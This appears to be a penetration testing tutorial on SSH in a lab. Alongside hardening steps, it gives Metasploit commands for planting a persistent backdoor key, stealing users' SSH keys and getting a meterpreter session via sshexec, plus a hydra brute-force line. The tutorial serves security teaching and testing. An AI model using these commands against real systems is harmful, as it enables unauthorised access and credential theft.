Probing through every open port is practically the first step hackers take in order to prepare their attack. And in order to work, one is required to keep their port open but at the same time, they are threatened by the fear of hackers. Therefore, one must learn to secure their ports even if they are open. In this post, we will discuss penetration testing of SSH which is also known as Secure Shell.
Introduction to SSH
The SSH protocol also stated to as Secure Shell is a technique for secure and reliable remote login from one computer to another. It offers several options for strong authentication, as it protects the connections and communications\ security and integrity with strong encryption. It is a secure alternative to the non-protected login protocols (such as telnet, rlogin) and insecure file transfer methods (such as FTP).
It very easy to install and configure ssh service, we can directly install ssh service by using the openssh-server package from ubuntu repo. To install any service you must have root privilege account and then follow the given below command.
|1||apt install openssh-server|
when you will execute above command it will extract the package the install the default configure on the host machine. you can check open port with the help of netstat command on the host machine.
SSH Port Scanning
If you don’t have direct access to the host machine, use nmap to remotely identify the port state that is considered to be the initial step of the penetration test. Here we’re going to use Kali Linux to perform a penetration testing.
So, to identify an open port on a remote network, we will use a version scan of the nmap that will not only identify an open port but will also perform a banner grabbing that shows the installed version of the service.
|1||nmap -sV -p22 192.168.1.103|
Methods to Connect SSH
Terminal Command (Linux)
Now execute the following command to access the ssh shell of the remote machine as an authorized user. Username: ignite
Step1: Install putty.exe and run it, then enter the HOST IP address <192.168.1.103> and port <22>, also choose to connect type as SSH.
Step2: To establish a connection between the client and the server, a putty session will be generated that requires a login credential.
By default, ssh listen on port 22 which means if the attacker identifies port 22 is open then he can try attacks on port 22 in order to connect with the host machine. Therefore, a system admin chooses Port redirection or Port mapping by changing its default port to others in order to receive the connection request from the authorized network.
Follow the below steps for port redirection:
Step1: Edit the sshd_config from inside the /etc/sshd using the editor
Step2: Change port 22 into 2222 and save the file.
Step3: Then restart ssh
Port Redirection Testing
Thus, when we have run the scan on port 22, it has shown port state CLOSE for ssh whereas port 2222 OPEN for ssh which can be seen the given image.
Establish SSH connection using RSA key
Strong passwords don’t seem to be decent to secure the server because a brute force attack can crack them. That’s why you need an additional security method to secure the SSH server.
SSH key pairs is another necessary feature to authenticate clients to the server. It consists of a long string of characters: a public and a private key. You can place the public key on the server and private key on the client machine and unlock the server by connecting the private key of the client machine. Once the keys match up, the system permits you to automatically establish an SSH session without the need to type in a password.
Ssh-keygen is a tool for creating new authentication key pairs for SSH. Such key pairs are used for automating logins, single sign-on, and for authenticating hosts.
Thus, we will follow the steps for generating a key pair for authenticated connection.
Step1: Run the given command to generate an ssh key pair (id_rsa and id_rsa.pub) on the host machine Ubuntu.
Step2: Same should be done on the client machine which is authorized to establish the connection with the host machine (ubuntu).
Step3: Once the ssh key pair (id_rsa and id_rsa.pub) get generated then rename the id_rsa.pub into authorized_keys as show in the given image.
|1234||ssh-keygencd .sshlscat id_rsa.pub > authorized_keys|
Step4: Share the authorized_keys with the host machine by copying it into the .ssh directory.
Step5: Edit the sshd_config from inside the /etc/sshd using the editor
Step6: Enable the “passwordauthentication no” comment
As a result of only the authorized machine which rsa key can establish a connection with the host machine without using password.
Now if you need to connect to the ssh server using your password username, the server will drop your connection request because it will authenticate the request that has authorized key.
Step7: Copy the id_rsa key from Kali Linux to the windows machine, to established connection using authorized keys on the windows machine,
Step8: Install puttygen.exe
Step 9: Run puttygen.exe and load the id_rsa and “save as key” named as Key
Step10: Use putty.exe to connect with the host machine by entering hostname 192.168.1.103 and port 22.
Step11: Navigate to SSH >auth and browse the key private key that you have saved as mention in step 9.
This will establish an ssh connection between windows client and server without using a password.
Exploit SSH with Metasploit
SSH Key Persistence- Post Exploitation
Consider a situation, that by compromising the host machine you have obtained a meterpreter session and want to leave a permanent backdoor that will provide a reverse connection for next time.
This can be achieved with the help of the Metasploit module named “SSH Key Persistence-a post exploit” when port 22 is running on the host machine.
This module will add an SSH key to a specified user (or all), to allow remote login on the victim via SSH at any time.
|123||use post/linux/manage/sshkey_persistencemsf post(sshkey_persistence) > set session 1msf post(sshkey_persistence) >exploit|
As can be seen in the image given, it added authorized keys to /home / ignite/.ssh and stored a private key within /root/.msf4/loot
As we ensure this by connecting the host machine via port 22 using a private key generated above. Here I have renamed the private as “key” and gave permission 600.
|12||chmod 600 keyssh -i key firstname.lastname@example.org|
Bravo!! It works without any congestion and in this way, we can use ssh key as persistence backdoor.
Stealing the SSH key
Consider a situation, that by compromising the host machine you have obtained a meterpreter session and port 22 is open for ssh and you want to steal SSH public key and authorized key. This can be done with the help Metasploit module named “Multi Gather OpenSSH PKI Credentials Collection -a post exploit” as discussed below.
This module will collect the contents of all users .ssh directories on the targeted machine. Additionally, known_hosts and authorized_keys and any other files are also downloaded. This module is largely based on firefox_creds.rb.
|123||use post/multi/gather/ssh_credsmsf post(ssh_creds) >set session 1msf post(ssh_creds) >exploit|
From given below image you can see we have got all authorized keys store in /home/ignite/.ssh directory in our local machine at /root/.msf4/loot and now use those keys for login into an SSH server.
This can be done manually by downloading keys directly from inside /home/ignite/.ssh as shown in the below image.
As we ensure this by connecting the host machine via port 22 using private key downloaded above. Let’s change the permission for the rsa key and to do this follow the step given below.
|12||chmod 600 keyssh -i key email@example.com|
It works without any congestion and in this way, we can use ssh key as persistence backdoor.
SSH login using pubkey
Considering you have id_rsa key of the host machine and want to obtain meterpreter session via Metasploit and this can be achieved with the help of the following module.
This module will test ssh logins on a range of machines using a defined private key file and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. Key files may be a single private key or several private keys in a single directory.
|12345||use auxillary/scanner/ssh /ssh_login_pubkeyauxiliary (scanner/ssh /ssh_login_pubkey)>set rhosts 192.168.1.103auxiliary (scanner/ssh /ssh_login_pubkey)>set username igniteauxiliary (scanner/ssh /ssh_login_pubkey)>set key_path /root/.ssh/id_rsaauxiliary (scanner/ssh /ssh_login_pubkey)>exploit|
This will give a command session which can be further updated into the meterpreter session by executing the following command.
|1||sessions -u 1|
SSH Password cracking
We can test a brute force attack on ssh for guessing the password or to test threshold policy while performing penetration testing on SSH. It requires a dictionary for username list and password list, here we have username dictionary “user.txt” and password list named “pass.txt” to perform the brute force attack with the help of hydra
|1||hydra -L user.txt -P pass.txt 192.168.1.103 ssh|
As a result, you can observe that the host machine has no defence against brute force attack, and we were able to obtain ssh credential.
To protect your service against brute force attack you can use fail2ban which is an IPS. Read more from here to setup fail2ban IPS in the network.
If you will observe the given below image, then it can see here that this time the connection request drops by host machine when we try to launch a brute force attack.
SSH Public Key Login Scanner
This module will test ssh logins on a range of machines using a defined private key file, and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. Key files may be a single private key or several private keys in a single directory. Only a single passphrase is supported, however, so it must either be shared between subject keys or only belong to a single one.
|12345||msf > use auxiliary/scanner/ssh/ssh_login_pubkeymsf auxiliary(ssh_login_pubkey) > set rhosts 192.168.1.103msf auxiliary(ssh_login_pubkey) > set user_file /root/user.txtmsf auxiliary(ssh_login_pubkey) > set key_path /root/.ssh/id_rsa.pubmsf auxiliary(ssh_login_pubkey) > run|
As a result, you can observe that user “ignite” is authorized to use the public to connect with ssh of the host machine.
SSH User Code Execution
This module connects to the target system and executes the necessary commands to run the specified payload via SSH. If a native payload is specified, an appropriate stager will be used. Thus we gave host IP along with username and password, if everything goes in right then we get meterpreter session on our listening machine.
|123456||msf > use exploit/multi/ssh/sshexecmsf exploit(sshexec) >set rhosts 192.168.1.103msf exploit(sshexec) >set username ignitemsf exploit(sshexec) >set password 123msf exploit(sshexec) >set srvhost 192.168.1.107msf exploit(sshexec) >exploit|
as a result you can observe that we have meterpreter session of the host machine.
Conclusion: In this post, we try to discuss the possible way to secure SSH and perform penetration testing against such a scenario.